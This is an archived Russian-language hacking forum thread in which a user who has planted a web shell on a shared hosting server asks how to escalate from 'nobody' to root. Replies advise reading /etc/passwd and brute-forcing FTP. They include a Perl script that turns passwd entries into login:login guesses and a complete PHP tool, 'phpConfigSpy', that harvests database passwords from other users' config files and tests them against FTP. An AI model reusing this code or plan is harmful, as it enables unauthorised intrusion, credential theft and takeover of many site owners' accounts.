nobody >> root возможно ли [Архив]

Просмотр полной версии : nobody >> root возможно ли

undewaternemo

05.04.2007, 19:08

Привет
залил шелл
id показывает нободи

php инфо показывает

System Linux xxx.xxxxxxxxxx.xxx 2.6.9-42.0.3.ELsmp #1 SMP Fri Oct 6 06:21:39 CDT 2006 i686
Build Date Mar 8 2007 20:58:43
Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
mysql Client API version 4.1.21

запарковано много доменов - штук 100 юзверов
как поднять привелегии
спанель вроде обновляется каждый день - не может же быть что сплойты с милворма работали - а как дальше копать ума не приложу
подскажите план действий пожалуйста

цель - поиметь рута или юзера

disable_classes no value no value
disable_functions no value no value
safe_mode Off

blaga

05.04.2007, 19:12

Посмотри сплоиты под ядро, под сервисы... Еще как вариант через суйдные файлы... но я в жтом не особо спец...( Погугли на темы которые я привел...

Stefun

05.04.2007, 22:34

скорее всего это какой хостинг, ты проверь по ип ))
лучше не соваться в такой сервак.

zl0ba

05.04.2007, 23:41

2Stefun хекеры не чего не бояться!

Проверь поиском на файлы типа password/ посмотри открыт /etc/passwd если да, то пробуй брутить FTP login:login , ищи пасы к БД, возможны эти пасы подойдут к другому сервису.

KPOT_f!nd

06.04.2007, 03:08

посмотри открыт /etc/passwd если да, то пробуй брутить FTP login:login
вот тебе парсер:

#!/usr/bin/perl

open(IN,"pwd.txt");
open(OUT,">pwds.txt");
while(<IN>) {
chomp;
if (~/sh$/) { ## Запишем только валидные аккаунты
($u,@undef)=split ":";
print OUT "$u:$u\n"; ## В виде пары login:login
}
}
close(IN);
close(OUT);

ищи пасы к БД, возможны эти пасы подойдут к другому сервису.
.conf
.config
сonf.php
config.php

p-range

06.04.2007, 09:50

Раз уж на то пошло, вот мой скрипт для нахождения в системе конфигурационных файлов, вытягивания оттуда пары логин:пароль и пробе подключения к ftp.
скрипт несложный, разберешься.
необходимо изменить всего 2 строчки:
$dirz = "/home/$username/public_html/";
и
$path = "/home/$user/public_html/";
- полный путь до директорий с сайтами.

<?php
/*
phpConfigSpy v0.2
coded by p-range #645552
(c) http://p-range.info
*/
echo '<html><head><title>phpConfigSpy v0.2</title></head><body>';
($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('Error: safe_mode = on');
set_time_limit(0);
###################
@$passwd = fopen('/etc/passwd','r');
if (!$passwd) { die('[-] Error : coudn`t read /etc/passwd'); }
$pub = array();
$users = array();
$conf = array();
$i = 0;
while(!feof($passwd))
{
$str = fgets($passwd);
if ($i > 35)
{
$pos = strpos($str,':');
$username = substr($str,0,$pos);
$dirz = '/home/'.$username.'/public_html/';
if (($username != ''))
{
if (is_readable($dirz))
{
array_push($users,$username);
array_push($pub,$dirz);
}
}
}
$i++;
}
###################
echo ' <textarea cols="100" rows="20">';
echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
echo "[~] Searching for passwords in config files...\n\n";
foreach ($users as $user)
{
$path = "/home/$user/public_html/";
read_dir($path,$user);
}
echo "\n[+] Done\n";
function read_dir($path,$username)
{
if ($handle = opendir($path))
{
while (false !== ($file = readdir($handle)))
{
$fpath = "$path$file";
if (($file != '.') and ($file != '..'))
{
if (is_readable($fpath))
{
$dr = $fpath."/";
if (is_dir($dr))
{
read_dir($dr,$username);
}
else
{
if (
($file=='config.php')
or ($file=='config.inc.php')
or ($file=='conf.php')
or ($file=='settings.php')
or ($file=='setup.php')
or ($file=='dbconf.php')
or ($file=='dbconfig.php')
or ($file=='db.inc.php')
or ($file=='dbconnect.php')
or ($file=='connect.php')
or ($file=='index.php')
or ($file=='common.php')
or ($file=='config_global.php')
or ($file=='db.php')
or ($file=='connect.inc.php')
or ($file=='dbconnect.inc.php'))
{
$pass = get_pass($fpath);
if ($pass != '')
{
echo "[+] $fpath\n$pass\n";
ftp_check($username,$pass);
}
}
}
}
}
}
}
}
function get_pass($link)
{
@$config = fopen($link,'r');
while(!feof($config))
{
$line = fgets($config);
if (strstr($line,'pass')
or strstr($line,'pwd')
or strstr($line,'db_pass')
or strstr($line,'dbpass')
or strstr($line,'passwd'))
{
if (strrpos($line,'"'))
{
preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);
$pass = str_replace("]=\"","",$pass);
}

else
preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);
$pass = str_replace("]='","",$pass);
return $pass[2];
}
}
}
function ftp_check($login,$pass)
{
@$ftp = ftp_connect('127.0.0.1');
if ($ftp)
{
@$res = ftp_login($ftp,$login,$pass);
if ($res)
{
echo '[FTP] '.$login.':'.$pass." Success !\n";
}
else ftp_quit($ftp);
}
}
echo '</textarea> Coded by $re@m3r & p-range <a href=http://p-range.info>p-range.info</a></body></html>';
?>

Zitt

06.04.2007, 15:48

Если проблемы с сплойтами, заюзай шелл nfm, там есть компилёные, или читай тут
http://forum.antichat.ru/thread26510.html